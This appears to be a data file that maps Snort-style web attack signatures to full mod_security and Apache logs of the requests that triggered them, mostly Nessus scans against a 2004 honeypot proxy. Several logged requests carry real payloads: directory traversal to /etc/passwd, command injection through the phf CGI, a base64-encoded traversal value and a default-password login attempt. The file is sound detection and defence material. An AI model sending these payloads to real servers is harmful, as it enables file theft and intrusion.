1709		web-application-activity	WEB-CGI ad.cgi access	Request: 218.73.15.215 - - [Wed Mar 10 21:37:04 2004] "GET http://www.afreeb.com/offers/ad.cgi?of=855&af=207902 HTTP/1.0" 302 315 Handler: proxy-server Error: mod_security: Warning. Pattern match "/ad\.cgi" at THE_REQUEST. ---------------------------------------- GET http://www.afreeb.com/offers/ad.cgi?of=855&af=207902 HTTP/1.0 Accept: / Accept-Language: en Host: www.afreeb.com Pragma: no-cache Referer: http://searchwithbest.com/search.php?PHPSESSID=a0107b976c97977efcaa628d1d163ff2&q=auctions User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) X-Forwarded-For: 204.149.149.128 mod_security-message: Warning. Pattern match "/ad\.cgi" at THE_REQUEST. HTTP/1.0 302 Found Location: http://offersquest.directtrack.com/ad/335/CD982/lead_info=207902 Content-Type: text/html; charset=iso-8859-1 X-Cache: MISS from www.testproxy.net Connection: close
1710		web-application-activity	WEB-CGI bbs_forum.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:45:07 2004] "GET /cgi-bin/bbs_forum.cgi HTTP/1.1" 404 301 Handler: cgi-script Error: mod_security: Warning. Pattern match "/bbs_forum\.cgi" at THE_REQUEST. ---------------------------------------- GET /cgi-bin/bbs_forum.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/bbs_forum\.cgi" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=94 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1711		web-application-activity	WEB-CGI bsguest.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:45:27 2004] "GET /cgi-bin/bsguest.cgi HTTP/1.1" 404 299 Handler: cgi-script Error: mod_security: Warning. Pattern match "/bsguest\.cgi" at THE_REQUEST. ---------------------------------------- GET /cgi-bin/bsguest.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/bsguest\.cgi" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1712		web-application-activity	WEB-CGI bslist.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:45:31 2004] "GET /cgi-bin/bslist.cgi HTTP/1.1" 403 302 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/bslist.cgi ---------------------------------------- GET /cgi-bin/bslist.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1713		web-application-activity	WEB-CGI cgforum.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:45:34 2004] "GET /cgi-bin/cgforum.cgi HTTP/1.1" 403 303 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/cgforum.cgi ---------------------------------------- GET /cgi-bin/cgforum.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=97 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1715		web-application-activity	WEB-CGI register.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:45:41 2004] "GET /cgi-bin/register.cgi HTTP/1.1" 403 304 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/register.cgi ---------------------------------------- GET /cgi-bin/register.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=37 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1716	CVE-2000-1131	web-application-activity	WEB-CGI gbook.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:45:38 2004] "GET /cgi-bin/gbook.cgi HTTP/1.1" 403 301 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/gbook.cgi ---------------------------------------- GET /cgi-bin/gbook.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=63 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1717		web-application-activity	WEB-CGI simplestguest.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:45:42 2004] "GET /cgi-bin/simplestguest.cgi HTTP/1.1" 403 309 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/simplestguest.cgi ---------------------------------------- GET /cgi-bin/simplestguest.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=25 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1724	CAN-2002-1526	web-application-activity	WEB-CGI emumail.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:45:36 2004] "GET /cgi-bin/emumail.cgi HTTP/1.1" 403 303 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/emumail.cgi ---------------------------------------- GET /cgi-bin/emumail.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=79 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1730	Nessus 10645 CAN-2001-0466	web-application-attack	WEB-CGI ustorekeeper.pl directory traversal attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:39:10 2004] "GET /cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd HTTP/1.1" 403 307 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/ustorekeeper.pl ---------------------------------------- GET /cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1762	CVE-1999-0067 arachNIDS 128 BID629	web-application-attack	WEB-CGI phf arbitrary command execution attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:42:32 2004] "GET /cgi-bin/phf?QALIAS=x%0a/bin/cat%20/etc/passwd HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: Invalid character detected [10] ---------------------------------------- GET /cgi-bin/phf?QALIAS=x%0a/bin/cat%20/etc/passwd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Invalid character detected mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1767	CAN-2000-0835 Nessus 10514	web-application-activity	WEB-MISC search.dll access	Request: 61.237.215.17 - - [Thu Mar 11 06:01:23 2004] "GET http://www.qksrv.net/click-1378908-5319899-828608071012204703?loc=http://search.ebay.com/search/search.dll?query=dreamcast&MfcISAPICommand=GetResult&ht=1&SortProperty=MetaEndSort HTTP/1.0" 302 753 Handler: proxy-server Error: mod_security: Warning. Pattern match "/search\.dll" at THE_REQUEST. ---------------------------------------- GET http://www.qksrv.net/click-1378908-5319899-828608071012204703?loc=http://search.ebay.com/search/search.dll?query=dreamcast&MfcISAPICommand=GetResult&ht=1&SortProperty=MetaEndSort HTTP/1.0 Accept: image/gif, image/jpeg, image/x-xbitmap, application/vnd.ms-excel, / Accept-Language: en-us Host: www.qksrv.net Pragma: no-cache Referer: http://search.revenuepilot.com/servlet/search?mode=search&id=8601&sid=0&keyword=Dreamcast User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows ME) X-Forwarded-For: 205.94.253.235 mod_security-message: Access denied with code 200. Pattern match "/search" at THE_REQUEST. HTTP/1.0 302 Found P3P: policyref="http://www.qksrv.net/w3c/p3p.xml", CP="ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT" Cache-control: no-cache Pragma: max-age=0 Location: http://www.commission-junction.com/track/track.dll?AID=5319899&PID=1378908&UID1811=arxjpg5-800295679-1079002883781-20&CBID=t8rs8ycq&SID=828608071012204703&loc=http%3A%2F%2Fsearch.ebay.com%2Fsearch%2Fsearch.dll%3Fquery%3Ddreamcast&MfcISAPICommand=GetResult&ht=1&SortProperty=MetaEndSort Set-Cookie: S=arxjpg5-800295679-1079002883781-20; domain=.qksrv.net; path=/; expires=Tue, 10-Mar-2009 11:01:23 GMT Set-Cookie: QKINFO=ef5d-360uz-tjz0-828608071012204703-120-t8rs8ycq-; domain=.qksrv.net; path=/; expires=Tue, 10-Mar-2009 11:01:23 GMT Set-Cookie: LCLK=cjo!ef5d-t8rs8ycq; domain=.qksrv.net; path=/; expires=Tue, 10-Mar-2009 11:01:23 GMT Content-Type: text/html Content-Length: 753 X-Cache: MISS from www.testproxy.net Connection: close
1769	macintouch	web-application-activity	WEB-MISC .DS_Store access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:42 2004] "GET /.DS_Store HTTP/1.1" 403 293 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/.DS_Store ---------------------------------------- GET /.DS_Store HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1770	securiteam	web-application-activity	WEB-MISC .FBCIndex access	Request: 217.160.165.173 - - [Fri Mar 12 22:42:45 2004] "GET /.FBCIndex HTTP/1.1" 404 289 Handler: (null) Error: mod_security: Warning. Pattern match "/\.FBCIndex" at THE_REQUEST. ---------------------------------------- GET /.FBCIndex HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/\.FBCIndex" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1772	ms00-094	web-application-activity	WEB-IIS pbserver access	Request: 217.160.165.173 - - [Fri Mar 12 22:46:53 2004] "GET /pbserver/pbserver.dll HTTP/1.1" 403 305 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/pbserver ---------------------------------------- GET /pbserver/pbserver.dll HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1774	securiteam	web-application-activity	WEB-PHP bb_smilies.php access	Request: 217.160.165.173 - - [Fri Mar 12 22:42:00 2004] "GET //bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK HTTP/1.1" 404 295 Handler: (null) Error: mod_security: Warning. Pattern match "/bb_smilies\.php" at THE_REQUEST. ---------------------------------------- GET //bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/bb_smilies\.php" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1787	BID4889 BID4887 BID4886 BID4885	web-application-activity	WEB-CGI csPassword.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:45:34 2004] "GET /cgi-bin/csPassword.cgi HTTP/1.1" 403 306 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/csPassword.cgi ---------------------------------------- GET /cgi-bin/csPassword.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=93 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1824	BID4983 Nessus 11027	web-application-activity	WEB-CGI alienform.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:41:51 2004] "GET /alienform.cgi?_browser_out=.\|.%2F.\|.%2F.\|.%2F.\|.%2F.\|.%2F.\|.%2F.\|.%2F.\|.%2F.\|.%2F.\|.%2F.\|.%2F.\|.%2Fetc%2Fpasswd HTTP/1.1" 403 297 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/alienform.cgi ---------------------------------------- GET /alienform.cgi?_browser_out=.\|.%2F.\|.%2F.\|.%2F.\|.%2F.\|.%2F.\|.%2F.\|.%2F.\|.%2F.\|.%2F.\|.%2F.\|.%2F.\|.%2Fetc%2Fpasswd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1825	BID4983 Nessus 11027	web-application-activity	WEB-CGI AlienForm af.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:41:52 2004] "GET /cgi-bin/af.cgi?_browser_out=.\|.%2F.\|.%2F.\|.%2F.\|.%2F.\|.%2F.\|.%2F.\|.%2F.\|.%2F.\|.%2F.\|.%2F.\|.%2F.\|.%2Fetc%2Fpasswd HTTP/1.1" 403 298 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/af.cgi ---------------------------------------- GET /cgi-bin/af.cgi?_browser_out=.\|.%2F.\|.%2F.\|.%2F.\|.%2F.\|.%2F.\|.%2F.\|.%2F.\|.%2F.\|.%2F.\|.%2F.\|.%2F.\|.%2Fetc%2Fpasswd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1826	Nessus 11037	web-application-activity	WEB-MISC WEB-INF access	Request: 217.160.165.173 - - [Fri Mar 12 22:30:21 2004] "GET /./WEB-INF/ HTTP/1.1" 404 288 Handler: (null) Error: mod_security: Warning. Pattern match "/WEB-INF" at THE_REQUEST. ---------------------------------------- GET /./WEB-INF/ HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/WEB-INF" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1827	BID5193 Nessus 11041	web-application-attack	WEB-MISC Tomcat servlet mapping cross site scripting attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:37:18 2004] "GET /servlet/org.apache.catalina.servlets.DefaultServlet/index.html HTTP/1.1" 403 346 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/servlet ---------------------------------------- GET /servlet/org.apache.catalina.servlets.DefaultServlet/index.html HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=99 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1829	BID4575 Nessus 11046	web-application-activity	WEB-MISC Tomcat TroubleShooter servlet access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:23 2004] "GET /examples/servlet/TroubleShooter HTTP/1.1" 404 311 Handler: (null) Error: mod_security: Warning. Pattern match "/examples/servlet/TroubleShooter" at THE_REQUEST. ---------------------------------------- GET /examples/servlet/TroubleShooter HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/examples/servlet/TroubleShooter" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1830	BID4575 Nessus 11046	web-application-activity	WEB-MISC Tomcat SnoopServlet servlet access	Request: 217.160.165.173 - - [Fri Mar 12 22:39:32 2004] "GET /examples/servlet/SnoopServlet HTTP/1.1" 404 309 Handler: (null) Error: mod_security: Warning. Pattern match "/examples/servlet/SnoopServlet" at THE_REQUEST. ---------------------------------------- GET /examples/servlet/SnoopServlet HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/examples/servlet/SnoopServlet" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=98 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1847	CAN-1999-0643 Nessus 10816	web-application-activity	WEB-MISC webalizer access	Request: 217.160.165.173 - - [Fri Mar 12 22:30:34 2004] "GET /webalizer/ HTTP/1.1" 404 290 Handler: (null) Error: mod_security: Warning. Pattern match "/webalizer/" at THE_REQUEST. ---------------------------------------- GET /webalizer/ HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/webalizer/" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1848	Nessus 10298 CAN-1999-0610	web-application-activity	WEB-MISC webcart-lite access	Request: 217.160.165.173 - - [Fri Mar 12 22:37:46 2004] "GET /webcart-lite/config/clients.txt HTTP/1.1" 403 315 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/webcart-lite ---------------------------------------- GET /webcart-lite/config/clients.txt HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=97 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1851	CAN-2000-0642 Nessus 10470	web-application-activity	WEB-MISC active.log access	Request: 217.160.165.173 - - [Fri Mar 12 22:42:37 2004] "GET /active.log HTTP/1.1" 404 290 Handler: (null) Error: mod_security: Warning. Pattern match "/active\.log" at THE_REQUEST. ---------------------------------------- GET /active.log HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/active\.log" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1852	Nessus 10302	web-application-activity	WEB-MISC robots.txt access	Request: 217.160.165.173 - - [Fri Mar 12 22:30:21 2004] "GET /robots.txt HTTP/1.1" 404 290 Handler: (null) Error: mod_security: Warning. Pattern match "/robots\.txt" at THE_REQUEST. ---------------------------------------- GET /robots.txt HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/robots\.txt" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1857	Nessus 10302	web-application-activity	WEB-MISC robot.txt access	Request: 217.160.165.173 - - [Fri Mar 12 22:44:23 2004] "GET /robot.txt HTTP/1.1" 404 289 Handler: (null) Error: mod_security: Warning. Pattern match "/robot\.txt" at THE_REQUEST. ---------------------------------------- GET /robot.txt HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/robot\.txt" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1859	Nessus 10995	default-login-attempt	WEB-MISC Sun JavaServer default password login attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:32:09 2004] "GET /servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22adminRealm%22%2C+uri%3D%22%2Fservlet%2Fadmin%22&service= HTTP/1.0" 200 566 Handler: (null) Error: mod_security: pausing [/servlet/admin] for 50000 ms ---------------------------------------- GET /servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22adminRealm%22%2C+uri%3D%22%2Fservlet%2Fadmin%22&service= HTTP/1.0 mod_security-message: Access denied with code 200. Pattern match "ae9f86d6beaa3f9ecb9a5b7e072a4138" at THE_REQUEST. mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1
1862	Nessus 11001	web-application-attack	WEB-CGI mrtg.cgi directory traversal attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:38:23 2004] "GET /cgi-bin/mrtg.cgi?cfg=/../../../../../../../../../etc/passwd HTTP/1.1" 403 300 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/mrtg.cgi ---------------------------------------- GET /cgi-bin/mrtg.cgi?cfg=/../../../../../../../../../etc/passwd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1868	CVE-2001-0804 Nessus 10817	default-login-attempt	WEB-CGI story.pl arbitrary file read attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:40:33 2004] "GET /cgi-bin/story.pl?next=../../../../../etc/passwd%00 HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: Invalid character detected [0] ---------------------------------------- GET /cgi-bin/story.pl?next=../../../../../etc/passwd%00 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Invalid character detected mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1869	CVE-2001-0804 Nessus 10817	default-login-attempt	WEB-CGI story.pl access	Request: 217.160.165.173 - - [Fri Mar 12 22:41:23 2004] "GET /cgi-bin/story.pl?next=about HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: pausing [/cgi-bin/story.pl] for 50000 ms ---------------------------------------- GET /cgi-bin/story.pl?next=about HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/story\.pl" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=99 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1870	CVE-2000-0117 Nessus 10253	web-application-activity	WEB-CGI siteUserMod.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:42:50 2004] "GET /.cobalt/siteUserMod/siteUserMod.cgi HTTP/1.1" 404 315 Handler: (null) Error: mod_security: Warning. Pattern match "/\.cobalt/siteUserMod/siteUserMod\.cgi" at THE_REQUEST. ---------------------------------------- GET /.cobalt/siteUserMod/siteUserMod.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/\.cobalt/siteUserMod/siteUserMod\.cgi" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
